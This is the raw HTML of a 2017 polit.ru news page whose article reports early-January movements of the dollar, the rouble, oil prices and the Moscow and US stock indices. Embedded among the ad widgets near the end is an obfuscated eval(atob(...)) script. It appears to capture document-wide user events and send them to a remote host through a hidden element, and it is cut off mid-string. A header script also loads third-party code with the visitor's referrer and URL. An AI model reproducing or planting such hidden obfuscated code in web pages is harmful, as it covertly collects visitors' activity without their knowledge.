<!DOCTYPE html>
<html prefix="og: http://ogp.me/ns#">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
    <title>Илья Карпюк: Приятный год для рынков - ПОЛИТ.РУ</title>

    <link rel="canonical" href="http://polit.ru/article/2017/01/04/market/"/>
    <link rel="manifest" href="/manifest.json">

    <!-- Stylesheets -->
    <link rel="stylesheet" type="text/css" href="/static/polit/css/main.css"/>
    <link rel="stylesheet" type="text/css" href="/static/polit/css/mark-up.css"/>
    <link rel="stylesheet" type="text/css" href="/static/polit/css/content.css"/>
    <link rel="stylesheet" type="text/css" href="/static/polit/css/new.css"/>
    <!--[if IE]><link rel="stylesheet" type="text/css" href="/static/polit/css/ie.css" /><![endif]-->
    <link rel="stylesheet" href="/ads/style.css" type="text/css" media="all"/>

    <meta name="robots" content="all"/>
    <meta name="google-site-verification" content="ZbGJDYfmTGZz23DSt4DiWF448AY8MAD_9PSbBo2DAXU"/>
    <meta property="fb:app_id" content="482430971798114"/>

    <meta name="description" content="Илья Карпюк: Приятный год для рынков - Полит.ру" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:site" content="@POLITRU_" /><meta property="og:title" content="Илья Карпюк: Приятный год для рынков - ПОЛИТ.РУ" /><meta property="og:url" content="http://polit.ru/article/2017/01/04/market/" /><meta property="og:description" content="Пока большая часть россиян отдыхает, биржи постепенно начинают работать. Причем, и российские, и мировые &amp;mdash; так что уже можно следить за первыми реакциями рынков на события нового года." /><meta property="og:image" content="http://polit.ru/media/photolib/2016/11/18/mmvb_600-450_1483525162.jpg" /><meta name="pubdate" content="2017-01-04T13:19:22.678167" />

    <script src="https://cdn.onesignal.com/sdks/OneSignalSDK.js" async></script>
    <script>
      var OneSignal = OneSignal || [];
      OneSignal.push(['init', {
        appId: '9b6ff30d-450f-4958-9b28-2e63e1c92158',
        subdomainName: 'polit-ru',
        safari_web_id: 'web.onesignal.auto.43f3e2d2-3818-43ea-aa50-e469d0e1e106'
      }]);
    </script>
    <script type="text/javascript" src="//vk.com/js/api/openapi.js"></script>
    <script type="text/javascript">
      VK.init({apiId: 3289294, onlyWidgets: true});
    </script>
    <link rel="alternate" type="application/rss+xml" title="Полная лента ПОЛИТ.РУ" href="/feeds/" />
    <link rel="alternate" type="application/rss+xml" title="Статьи ПОЛИТ.РУ" href="/feeds/article/" />
    <link rel="alternate" type="application/rss+xml" title="Ёлкин дня!" href="/feeds/elkin/" />
    <link rel="stylesheet" href="/static/polit/css/politgal.css" type="text/css" media="screen" />
    <script src="/static/polit/js/polit.js" type="text/javascript"></script>
    <script src="//lib.rl0.ru/adfox/7/adfox.custom.min.js" type="text/javascript"></script>
    <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
    <script type="text/javascript">document.write("<script type=text/javascript src=\""+"http://meelba.com/3.html?group=polit_ru&seoref="+encodeURIComponent(document.referrer)+"&ur=1&rnd="+Math.random()+"&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=key+po+umolchaniyu"+"\"><\/script>");</script>
    <script src="/static/polit/js/politart.js" type="text/javascript"></script><script src="/static/polit/js/politgal.js" type="text/javascript"></script><script id="js-mpf-mediator-init" data-counter="2771166" data-adaptive="true">!function(e){function t(t,n){if(!(n in e)){for(var r,a=e.document,i=a.scripts,o=i.length;o--;)if(-1!==i[o].src.indexOf(t)){r=i[o];break}if(!r){r=a.createElement("script"),r.type="text/javascript",r.async=!0,r.defer=!0,r.src=t,r.charset="UTF-8";;var d=function(){var e=a.getElementsByTagName("script")[0];e.parentNode.insertBefore(r,e)};"[object Opera]"==e.opera?a.addEventListener?a.addEventListener("DOMContentLoaded",d,!1):e.attachEvent("onload",d):d()}}}t("//top-fwz1.mail.ru/js/code.js","_tmr"),t("//mediator.imgsmail.ru/2/mpf-mediator.min.js","_mediator")}(window);</script>
  </head>
<body class="new">
    <!--BEGIN #header-->
      
<div class="page">
<div class="black-top">
  <a href="http://polit.ua/">Полiт.ua</a>
  <a href="http://govweb.ru/">Государственная сеть</a>
  <a href="http://www.goslyudi.ru">Государственные люди</a>
  
  
  <a href="/promo/">Войти</a>
  
</div>

<div class="top-box">
  <div class="top-logo">
    
      <a href="/"><img src="/static/polit/img/politru_logo_2012.jpg" width="230" height="108" alt="Полит.ру" title="Полит.ру"/></a>
    
  </div>
  <div class="editors-choice-box">
<ul class="editors-choice">
 
  <li>
    <a href="/article/2016/12/27/lessons/">
      
        <span class="author">Алексей Кудрин</span>
      
      Стратегические уроки
    </a>
  </li>
 
  <li>
    <a href="/article/2017/01/01/forecast/">
      
        <span class="author">Сергей Цирель</span>
      
      Год сплошных «не»
    </a>
  </li>
 
  <li>
    <a href="/article/2016/12/30/the_Flying_Disser/">
      
        <span class="author">Наталия  Демина</span>
      
      Диссертация Мединского как летучий голландец
    </a>
  </li>
 
  <li>
    <a href="/article/2016/12/29/onishenko/">
      
        <span class="author">Евгений  Онищенко</span>
      
      «Основной удар придется на московские и петербургские институты»
    </a>
  </li>
 
  <li>
    <a href="/article/2016/12/26/euspb/">
      
      Солидарность с Европейским-2
    </a>
  </li>

</ul>
</div>

  <div class="top-right">
    <div class="date-header" >
        <span id="date"><!-- date --> 4 января 2017, среда, 18:29<!-- /date --></span>
    </div>
    <div class="top-social">
      <a href="http://www.facebook.com/#!/politru" rel="nofollow"><img src="/static/polit/img/new-facebook.png" width="20" height="20" alt="Facebook"/></a>
      <a href="http://twitter.com/POLITRU_" rel="nofollow"><img src="/static/polit/img/new-twitter.png" width="20" height="20" alt="Twitter"/></a>
      <a href="http://polit.livejournal.com/" rel="nofollow"><img src="/static/polit/img/new-livejournal.png" width="20" height="20" alt="LiveJournal"/></a>
      <a href="http://vkontakte.ru/club21337773" rel="nofollow"><img src="/static/polit/img/new-vkontakte.png" width="20" height="20" alt="VK.com"/></a>
      <a href="/feeds/" rel="nofollow"><img src="/static/polit/img/new-rss.png" width="20" height="20" alt="RSS"/></a>
    </div>
    <div class="top-search">
      <form action="/search/">
        <table><tbody><tr>
          <td class="main"><div>
            <input type="search" name="q" id="search-q" onfocus="this.value=''" placeholder="Автор, Статья, Тема" />
          </div></td>
          <td><div>
            <input type="submit" value="ИСКАТЬ" id="search-submit" />
          </div></td>
        </tr></tbody></table>
      </form>
    </div>
  </div>
</div>
<div class="top-menu">
  <table><tbody><tr>
    <td><h2><a href="/news/">НОВОСТИ</a></h2></td>

    <td class="dot"><div class="blacksquare"></div></td>
    <td><h2><a href="/article/">СТАТЬИ</a></h2></td>

    <td class="dot"><div class="blacksquare"></div></td>

    <td><h2><a href="/author/">АВТОРЫ</a></h2></td>

    <td class="dot"><div class="blacksquare"></div></td>
    <td><h2><a href="/lectures/publ_lect/">ЛЕКЦИИ</a></h2></td>

    <td class="dot"><div class="blacksquare"></div></td>



    <td><h2><a href="/rubric/proscience/">PRO SCIENCE</a></h2></td>

    <td class="dot"><div class="blacksquare"></div></td>
    <td><h2><a href="/rubric/theater/">ТЕАТР</a></h2></td>

    <td class="dot"><div class="blacksquare"></div></td>

    <td><h2><a href="/district/">РЕГИОНЫ</a></h2></td>

    
  </tr></tbody></table>
</div>

    <!--END #header-->

    <!-- BEGIN #breadcrumbs -->
      	
    <!--END #breadcrumbs-->



 

  <div class="top-menu-shadow">


  
    
      
    <img src="/static/polit/img/green_block_shadow_bottom.jpg" alt=""/>
    




    
  


  </div>
  <div class="main-cols ib-parent">
  
    
      
<!-- BEGIN #left column -->

<div class="left-sidebar ib-col">

<!-- start banner google adsense -->
<!-- Polit\polit.ru\234x60 -->
<!--ins class="adsbygoogle"
style="display:inline-block;width:234px;height:60px"
data-ad-client="ca-pub-1154951643410219"
data-ad-slot="6440819918">
</ins>
<script>
(adsbygoogle=window.adsbygoogle || []).push({});
</script-->
<!-- stop banner google adsense -->

  
  <div class="left-or-right-top-banner-slot"></div>
  <div class="block likebox">
    <iframe src="//www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpolitru&amp;width=234&amp;height=168&amp;colorscheme=light&amp;show_faces=true&amp;border_color&amp;stream=false&amp;header=false" scrolling="no" frameborder="0" style="border-bottom: 1px solid #AAA; overflow:hidden; width:234px; height:153px;" allowTransparency="true"></iframe>

    <!-- VK Widget -->
    <div id="vk_groups"></div>
    <script type="text/javascript">
      VK.Widgets.Group("vk_groups", {mode: 0, width: "234", height: "10", color1: 'FFFFFF', color2: '2B587A', color3: '5B7FA6'}, 21337773);
    </script>
  </div>
     <div class="left-banner-slot-above-top-articles"></div>
     <div class="left-banner-slot-above-top-articles-2"></div>
     <div class="b2bcontext">
       Бизнесу:
       <ul>
         <li><a href="/b2b/research/">Маркетинговые исследования</a></li>
         <li><a href="/b2b/plan/?parent=rubricator&child=rubricatorbp">Бизнес-планы</a></li>
       </ul>
     </div>
     <div class="block netlenka">
         <div class="subject">Нетленка</div>
         <ul class="top-articles">
 
  <li>
    <a href="/article/2010/06/09/levada/">
      
        <span class="author">Лев Гудков и Любовь Борусяк</span>
      
       В кругу Юрия Левады
    </a>
  </li>
 
  <li>
    <a href="/article/2016/07/24/immoralism/">
      
        <span class="author">Лев Гудков</span>
      
      Имморализм посттоталитарного общества в России
    </a>
  </li>
 
  <li>
    <a href="/article/2016/01/31/conservatism/">
      
        <span class="author">Лев Гудков</span>
      
      Ресурсы путинского «консерватизма»
    </a>
  </li>
 
  <li>
    <a href="/article/2010/02/10/science/">
      
        <span class="author">Нина Брагинская и Любовь Борусяк</span>
      
      Язык науки
    </a>
  </li>
 
  <li>
    <a href="/article/2010/03/03/science/">
      
        <span class="author">Нина Брагинская и Любовь Борусяк</span>
      
      Путь в науке
    </a>
  </li>

</ul>

     </div>
     <div class="left-banner-slot-below-top-articles"></div>
     <div class="block">
         <div class="subject"><a href="/genre/seminars/">Семинары</a></div>
     </div>
     <div class="left-banner-slot-below-seminars"></div>
     <div class="top-district-news">
        <span style="text-transform: uppercase; font-size: 21px;">Новости регионов</span>
        
<div class="top-news" style="margin: 0px;">
  <br>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://dostup1.ru/society/Dve-mnogoetazhki-v-problemnom-Akademe-gotovy-k-sdache_90541.html" class="hover">Две многоэтажки в проблемном Академе готовы к сдаче</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://debri-dv.com/article/14819/komu_bolshe_nuzhen_dalnevostochnyy_gektar_nashim_ili_kitaycam" class="hover">Кому больше нужен дальневосточный гектар, нашим или китайцам?</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://debri-dv.com/article/14818/10_molodezhnyh_proektov_habarovska_po_itogam_foruma_poluchat_ot_100_do_300_tysyach_rubley" class="hover">10 молодежных проектов Хабаровска по итогам форума получат от 100 до 300 тысяч рублей</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://debri-dv.com/article/14817/mezhdunarodnye_problemy_opto-_i_mikroelektroniki_obsudyat_v_habarovske_okolo_100_uchenyh" class="hover">Международные проблемы опто- и микроэлектроники обсудят в Хабаровске около 100 ученых</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://debri-dv.com/article/14816/habarovskiy_kray_na_dv-forume_predstavil_model_proektnogo_upravleniya" class="hover">Хабаровский край на ДВ-форуме представил модель проектного управления</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://debri-dv.com/article/14815/vrach_bolonyaeva_zamenit_kommunalshchika_gladkih_v_habarovskoy_kraevoy_dume" class="hover">Врач Болоняева заменит коммунальщика Гладких в хабаровской краевой думе</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://debri-dv.com/article/14814/dalniy_vostok_okapyvaetsya_na_granicah_i_za_ee_predelami_napryazhenie_rastet" class="hover">Дальний Восток «окапывается» на границах и за ее пределами. Напряжение растет</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://debri-dv.com/article/14813/opasnyy_kartelnyy_sgovor_presekla_fas_v_chukotskoy_aviacii_i_v_okruzhnoy_vlasti" class="hover">Опасный картельный сговор пресекла ФАС в чукотской авиации и в окружной власти</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://feedproxy.google.com/~r/inklgd/~3/FwlxKhqc9yk/37714" class="hover">В Тбилиси у здания ЦИКа прошел митинг против результатов выборов</a>
      <!--/div-->
    </div>
  
    <div class="top-news-story2" style="margin-bottom: 15px;">
      <!--div class="top-news-text"-->
        <a href="http://vyatka.ru/news/Politseyskie_nashli_dvukh_yunykh_podrug_ushedshikh_iz_doma" class="hover">Полицейские нашли двух юных подруг, ушедших из дома</a>
      <!--/div-->
    </div>
  
</div>



     </div>

<!-- start redtram -->

<div id="n4p_28541">Loading...</div>
<script type="text/javascript" charset="utf-8">
  (function(d,s){
    var o=d.createElement(s);
    o.async=true;
    o.type="text/javascript";
    o.charset="utf-8";
    if (location.protocol == "https:") {
      o.src="https://js-ru.redtram.com/n4p/0/28/ticker_28541.js";
    }
    else {
      o.src="http://js.ru.redtram.com/n4p/0/28/ticker_28541.js";
    }
    var x=d.getElementsByTagName(s)[0];
    x.parentNode.insertBefore(o,x);
  })(document,"script");
</script>

<!-- end redtram -->

     <div class="block">
         <div class="subject">Спецпроекты</div>
         
<div class="link">
	<a href="/rubric/elections2016/">Выборы-2016 с Линой Арифулиной</a>
</div>

<div class="link">
	<a href="/rubric/ecology/">Экологическая повестка</a>
</div>

<div class="link">
	<a href="/rubric/opendata/">Открытое государство</a>
</div>

<div class="link">
	<a href="/rubric/politeia/">Русская политейя</a>
</div>

<div class="link">
	<a href="/rubric/future/">Прыжок в будущее</a>
</div>

<div class="link">
	<a href="/rubric/moscow/">Проект &quot;Москва&quot;</a>
</div>

<div class="link">
	<a href="/rubric/history_human/">История: человек, институты</a>
</div>

<div class="link">
	<a href="/rubric/literatures/">Национальные литературы</a>
</div>


     </div>
     <div class="block">
         <div class="subject"><a href="/genre/dossie/">Документы</a></div>
     </div>
     <div class="block">
         <div class="subject"><a href="/rubric/redakciya/">О проекте</a></div>
     </div>
     <div class="left-material-banner-slot-1"></div>
     <div class="left-banner-slot-0"></div>
     <div class="left-banner-slot-1"></div>
     <div class="block partners">
       <div class="subject">Партнеры</div>
       <div class="left-partners-slot-1"></div>
       <div class="left-partners-slot-2"></div>
       <div class="left-partners-slot-3"></div>
     </div>
 </div>
 <!-- END #left column -->

    
  
<!--BEGIN #content-->


  
    <div class="new-main-content ib-col">
      <div class="article-detail" id="material-article48977">
  
        <div id="fb-root"></div>
        <script>(function(d, s, id) {
          var js, fjs = d.getElementsByTagName(s)[0];
          if (d.getElementById(id)) return;
            js = d.createElement(s); js.id = id;
            js.src = "//connect.facebook.net/ru_RU/all.js#xfbml=1";
            fjs.parentNode.insertBefore(js, fjs);
          }(document, 'script', 'facebook-jssdk'));
        </script>
        <div class="date">
          04 января 2017, 13:19
          
            
              <div class="tags-subject">
                <span>
                  
                    <a href="/tag/dollar/">доллар</a>
                  
                    <a href="/tag/evro/">евро</a>
                  
                    <a href="/tag/oil/">нефть</a>
                  
                    <a href="/tag/rubl/">рубль</a>
                  
                    <a href="/tag/fondovaya-birzha/">фондовая биржа</a>
                  
                </span>
              </div>
            
          
        </div>
        
          
            
              <div class="authors">
                
                  <a href="/author/karpyuk/">Илья Карпюк</a>
                
              </div>
            
          
        
        <h1 class="title">Приятный год для рынков</h1>
        
        
          
            
          
          
          <div class="image-with-overlay d600x450 below23 image-gray-back-big">
            <a href="/media/photolib/2016/11/18/mmvb_600-450_1483525162.jpg" rel="lightbox" title="Торги на бирже ММВБ">
              <img src="/media/photolib/2016/11/18/thumbs/mmvb_600-450_1483525162.jpg.600x450_q85.jpg" alt="Торги на бирже ММВБ" title="Торги на бирже ММВБ" style="margin-top:-225px; margin-left:-300px;"/>
              
            </a>
            <div class="image-overlay image-overlay-bottom-right">
              Торги на бирже ММВБ
              
                <div class="image-extra-source"><a href="http://ntv.ru/" rel="nofollow">НТВ</a></div>
              
            </div>
          </div>
          
        
        <div class="content">
          
            
          
          <div class="text doc js-mediator-article">
            <p>Пока большая часть россиян отдыхает, биржи постепенно начинают работать. Причем, и российские, и мировые &mdash; так что уже можно следить за первыми реакциями рынков на события нового года.</p>
            



            
<p>Так, курс доллара по отношению к большинству мировых валют резко вырос. Значение рассчитываемого агентством Bloomberg индекса U.S. Dollar Index, отслеживающего изменение курса доллара США к евро, иене, фунту стерлингов, канадскому доллару, швейцарскому франку и шведской кроне вырос о вторник до максимума с 2002 года.</p>
<p>Сейчас за евро дают 1,0437 доллара, а еще вчера курс опускался до уровня 1,0341 &mdash; в последний раз столь близко к паритету курсы двух важнейших мировых валют находились в 2003 году.</p>
<p>При этом курсы валют, которые так или иначе зависят от цены на нефть в первые дни нового года растут. Это и канадский доллар, и норвежская крона и, само собой, российский рубль. Во вторник курс доллара к рублю опустился до уровня 60,355 руб. (потеряв более 90 копеек). Потом, впрочем, некоторое падение цен на нефть (цена барреля Brent опустилась до отметки $55,39, что на $2,99 ниже максимума первых в 2017 году торгов) повлекло за собой ослабление рубля, но не сильное &mdash; в среду торги сначала шли вокруг отметки 61 рубль за доллар, а потом рубль вышел в зеленую зону, рост курса составил примерно 25 копеек.</p>
<p>Зато прошедшие во вторник первые в 2017 году торги на фондовом рынке Московской биржи были очень удачными: значение индекса ММВБ впервые за всю историю превысило 2260 пунктов.</p>
<p>Индекс ММВБ рассчитывается на основе рублевых цен на акции 50 компаний, представляющих основные секторы экономики России. Индекс РТС, напротив, рассчитывается при помощи перевода цен на акции в доллары США. Поэтому после резкого обвала курса рубля в 2014-2015 гг. индекс РТС резко снизился, а индекс ММВБ остался примерно на тех же позициях.</p>
<p>На пике значение индекса ММВБ превышало значение в 2290 пунктов, но к закрытию индекс снизился и в среду торги уже открывались со значения 2275 пунктов.</p>
<p>Основными драйверами роста индекса стали акции Московской биржи, которые подорожали более чем на 3%, а также бумаги Rusal (плюс 4,08%), &laquo;Россетей&raquo; (плюс 3,16%), &laquo;Алросы&raquo; (плюс 2,94%) и &laquo;Аэрофлота&raquo; (плюс 2,29%).</p>
<p>Американский фондовый рынок также чувствует себя&nbsp;отлично. Во вторник индекс Dow Jones вырос на 0,27%, индекс S&amp;P 500 увеличился на 0,55%, а индекс электронной биржи NASDAQ поднялся на 0,47%.</p>
            
          </div>

          <div style="padding-bottom: 20px;"><h4 style="color: #007854;text-transform: uppercase;font-size: 120%;padding: 0;">Обсудите в соцсетях</h4>
            <script type="text/javascript">(function(w,doc) {
            if (!w.__utlWdgt ) {
                w.__utlWdgt = true;
                var d = doc, s = d.createElement('script'), g = 'getElementsByTagName';
                s.type = 'text/javascript'; s.charset='UTF-8'; s.async = true;
                s.src = ('https:' == w.location.protocol ? 'https' : 'http') + '://w.uptolike.com/widgets/v1/uptolike.js';
                var h=d[g]('body')[0];
                h.appendChild(s);
            }})(window,document);
            </script>
            <div data-background-alpha="0.0" data-buttons-color="#ffffff" data-counter-background-color="#ffffff" data-share-counter-size="12" data-top-button="false" data-share-counter-type="separate" data-share-style="10" data-mode="share" data-like-text-enable="false" data-hover-effect="scale" data-mobile-view="false" data-icon-color="#ffffff" data-orientation="horizontal" data-text-color="#ffffff" data-share-shape="rectangle" data-sn-ids="fb.tw.vk.ok.lj.em." data-share-size="40" data-background-color="#ffffff" data-preview-mobile="false" data-mobile-sn-ids="fb.vk.tw.wh.ok.gp." data-pid="1413315" data-counter-background-alpha="1.0" data-following-enable="false" data-exclude-show-more="true" data-selection-enable="false" class="uptolike-buttons" ></div>
          </div>
        </div>

        <!-- start banner google adsense -->
        <!-- Polit\polit.ru\468x60 -->
        <!--ins class="adsbygoogle"
        style="display:inline-block;width:468px;height:60px"
        data-ad-client="ca-pub-1154951643410219"
        data-ad-slot="4824359318">
        </ins>
        <script>
        (adsbygoogle=window.adsbygoogle || []).push({});
        </script-->
        <!-- stop banner google adsense -->

        
        
        <div class="bottom-social stop">
          <div class="print">
            <a href="/article/2017/01/04/market/print/" rel="nofollow">Версия для печати</a>
          </div>
        </div>
       <!--  
<div class="comments stop">
  <div class="subject">Комментарии</div>
  <div class="comments-content">
    <div class="fb-comments" data-href="http://polit.ru/article/2017/01/04/market/" data-width="580" data-num-posts="10"></div>
    <div id="vk_comments"></div>
    <script type="text/javascript">
      VK.Widgets.Comments("vk_comments", {limit: 10, width: "580", attach: false});
    </script>
  </div>
</div>

 -->
	<script type="text/javascript" src="/static/orphus/orphus.js"></script>
	<a href="http://orphus.ru" id="orphus" target="_blank" title="Система Orphus" rel="nofollow"><img alt="Система Orphus" src="/static/orphus/orphus.gif" border="0" width="600"></a>
        
          
        
        <div style="width:600px;">
      <!-- 24СМИ Start -->
      <div id="smi_teaser_3061">
           <center><a href="http://ex.24smi.info">Новости 24СМИ</a></center>
      </div>
      <script type="text/JavaScript" encoding="utf8">
               (function() {
               var sm = document.createElement("script");
               sm.type = "text/javascript";
               sm.async = true;
               sm.src = "http://jsn.24smi.org/4/a/3061.js";
               var s = document.getElementsByTagName("script")[0];
               s.parentNode.insertBefore(sm, s);})();
      </script>
      <!-- 24СМИ End -->

      <!-- LentaInformNews Start -->
      <div id="LentaInformScriptRootN11072" class="news-block-magick">
        <div id="LentaInformPreloadN11072">
          <a href="http://lentainform.com/" target="_blank">Загрузка...</a>
        </div>
        <script>
                (function(){
            var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
            var i=d[ce]('iframe');i[st][ds]=n;d[gi]("LentaInformScriptRootN11072")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
            catch(e){var iw=d;var c=d[gi]("LentaInformScriptRootN11072");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=11072;c[ac](dv);
            var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsn.lentainform.com/p/o/polit.ru.11072.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
        </script>
      </div>
      <!-- LentaInformNews End -->

      <!-- google adsense -->
<script type="text/javascript"><!--
google_ad_client = "ca-pub-1191230850516122";
/* adxguru\polit.ru\468x60\0 */
google_ad_slot = "8133317607";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="//pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
      <!-- google adsense End -->

      <!-- MarketGidNews Start -->
      <div id="MarketGidScriptRootN13911" class="news-block-magick">
           <div id="MarketGidPreloadN13911">
                <a href="http://marketgid.com/" target="_blank">Загрузка...</a>
           </div>
           <script>
               (function(){
                   var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
                   var i=d[ce]('iframe');i[st][ds]=n;d[gi]("MarketGidScriptRootN13911")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
                   catch(e){var iw=d;var c=d[gi]("MarketGidScriptRootN13911");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=13911;c[ac](dv);
                   var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsn.marketgid.com/1/p/1.polit.ru.13911.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
           </script>
      </div>
      <!-- MarketGidNews End -->

      <!-- smi2 Start -->
      <div id="unit_84866"><a href="http://smi2.net/">Новости СМИ2</a></div>
      <script type="text/javascript" charset="utf-8">
        (function() {
          var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
          sc.src = '//news.smi2.ru/data/js/84866.js'; sc.charset = 'utf-8';
          var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
        }());
      </script>
      <!-- smi2 End -->


      <!-- RedTram Start -->
      <div id="n4p_15006">Loading...</div>
      <script type="text/javascript" charset="utf-8">
      (function(d,s){
      var o=d.createElement(s);
      o.async=true;
      o.type="text/javascript";
      o.charset="utf-8";
      if (location.protocol == "https:")
      { o.src="https://js-goods.redtram.com/ticker_15006.js"; o.setAttribute("alt-src","https://js-goods.redtram.com/ticker_15742.js");}
      else
      { o.src="http://js.grt02.com/ticker_15006.js"; o.setAttribute("alt-src","http://js.grt02.com/ticker_15742.js");}
      o.setAttribute("cur-id","n4p_15006");
      o.setAttribute("alt-id","n4p_15742");
      o.setAttribute("o-data",eval(atob('KGZ1bmN0aW9uKCl7dmFyIGE9KGMpKCJcInluc3AlYXN0b2FFc0VBZXFydDlkaHZueS9Fb0JlQWNGbG5sSkRYTHMldE0lRXMlVnRhQWZuJXJkMyVcIm43TVVhJWVpeGR0YTAsZW9zciBhZCVRYSllZWxlV2V0VGR0VHNsaXNuZWUlc25lbmklbXVzV3JkcnN3JSVlJSVSZWFkYS5zS2VoJW1XJXFMc3Jvd29zcl93byVlcmVvJTpHb0VpNW9ydCUoME91bm5uQWMlOnhpZShvc3BocmdsYXNucm95dGV0bnlJJ1pheCVyQXJpb2lHJWd0ZGRzdHppYS9ubUFlZ1RlXCJyJyVpQ25kcE9jZXNsaGh0dGNhcGFubU5DZSVjcmp3ZWNlYmV1Y0l0bSVhXCJidGVuZWVjaXBvd25kTSV0czZhLy8lQXJBZ25zeE9hb25vX0Ulc2xoZ2dwYSVrJXJnSCVycGdBcHJzb2RuZHR5ZCV7cHV0bW8vcmVwSWVlcXNldG9QUi8lJXI7aWFhZWxjJWN5bSVvUlwiJXQlQXJBb21BcGlwbmllKEtlb0J9aEFsU2ZvdEJBckVmT2VrJUFpb29YSHd1R2ZtJW9BZGwlbXRlbi5tbjp2bHNBKWglb2VjdW1ldXQlPWVlZW50bGU7ZUJhYW9naHBpZnJqdmV0dEVlblRwYXQ4cnRndG1kJWdzdSVOTm9Dbnkxd3NBZHJxeW5ldFNkcGUlcm0lc29kQWUuJSVsZWp9JWNBeSVuVHVkb3NSdGJcImVsNm9yOnNkbzp4ZUhvQyVibm97aHNuJW9BJVF0QW8sZW50bUc9fCVcIiVpbFdFRG5zbnBybGxyQmhFbDJpNCV3dGkpZnB0X3QvNSVMZU5zQ3ZlYUFka2VvZSVlYSV3bG9wcmphU3RldGF0Z2V6aHI0bW9uc0wuU3RlaUF0YXlvXCIlJUFiZXNFZmFvdCIsMTM2ODYwMzMpO2Z1bmN0aW9uIGMoZSxwKXt2YXIgYj1lLmxlbmd0aDt2YXIgbD1bXTtmb3IodmFyIG89MDtvPCBiO28rKyl7bFtvXT0gZS5jaGFyQXQobyl9O2Zvcih2YXIgbz0wO288IGI7bysrKXt2YXIgZj1wKiAobysgNSkrIChwJSA0NTg4NDIpO3ZhciBjPXAqIChvKyA3KSsgKHAlIDI2NTk3NSk7dmFyIG49ZiUgYjt2YXIgZz1jJSBiO3ZhciBoPWxbbl07bFtuXT0gbFtnXTtsW2ddPSBoO3A9IChmKyBjKSUgNTU5MTc4Nzd9O3ZhciBqPVN0cmluZy5mcm9tQ2hhckNvZGUoMTI3KTt2YXIgbT0iIjt2YXIgaT0iXHgyNSI7dmFyIGE9Ilx4MjNceDMxIjt2YXIgZD0iXHgyNSI7dmFyIHE9Ilx4MjNceDMwIjt2YXIgaz0iXHgyMyI7cmV0dXJuIGwuam9pbihtKS5zcGxpdChpKS5qb2luKGopLnNwbGl0KGEpLmpvaW4oZCkuc3BsaXQocSkuam9pbihrKS5zcGxpdChqKX1mdW5jdGlvbiBiKCl7ZnVuY3Rpb24gaChnLGYpe2lmKCFjKXtiPSB0cnVlfTt2YXIgaj1bYVswXSxhWzFdLGFbMl1dLGk9YVszXSxlLGg9MDtnPSAxMDtmPSAxNjtlPSBnKyBNYXRoW2FbNV1dKE1hdGhbYVs0XV0oKSogKGYtIGcpKTtpZighYSl7Yj0gMX07Zm9yKHZhciBkPTA7ZDwgZTtkKyspe2krPSBqW2hdW01hdGhbYVs1XV0oTWF0aFthWzRdXSgpKiBqW2hdW2FbNl1dKV07aD0gKGgrIE1hdGhbYVs1XV0oTWF0aFthWzRdXSgpKiAxMDApKSUgM307cmV0dXJuIGl9dmFyIGQ9e307ZFthWzddXT0gW107ZFthWzhdXT0gZnVuY3Rpb24oYil7ZFthWzddXVthWzEwXV0oYlthWzldXSl9O2RvY3VtZW50W2FbMTJdXShhWzExXSxkW2FbOF1dLHRydWUpO2Z1bmN0aW9uIGcoYil7cmV0dXJuIGJbYVsxNV1dKGFbM10pW2FbMTRdXSgpW2FbMTNdXShhWzNdKX12YXIgZj1kb2N1bWVudFthWzE3XV0oYVsxNl0pO2ZbYVsxOV1dW2FbMThdXT0gYVsyMF07ZG9jdW1lbnRbYVsyMl1dW2FbMjFdXShmKTtkW2FbMjNdXT0gIG5ldyBmW2FbMjldXVthWzI4XV0oZyhhWzI0XSsgKChsb2NhdGlvblthWzI1XV09PSBhWzI2XSk/YVsyN106YVsyM10pKSk7aWYoIWMpe2M9IDF9O2RbYVsyM11dW2FbMzBdXT0gZnVuY3Rpb24oZCl7aWYoYz09IDEpe2IoZmFsc2U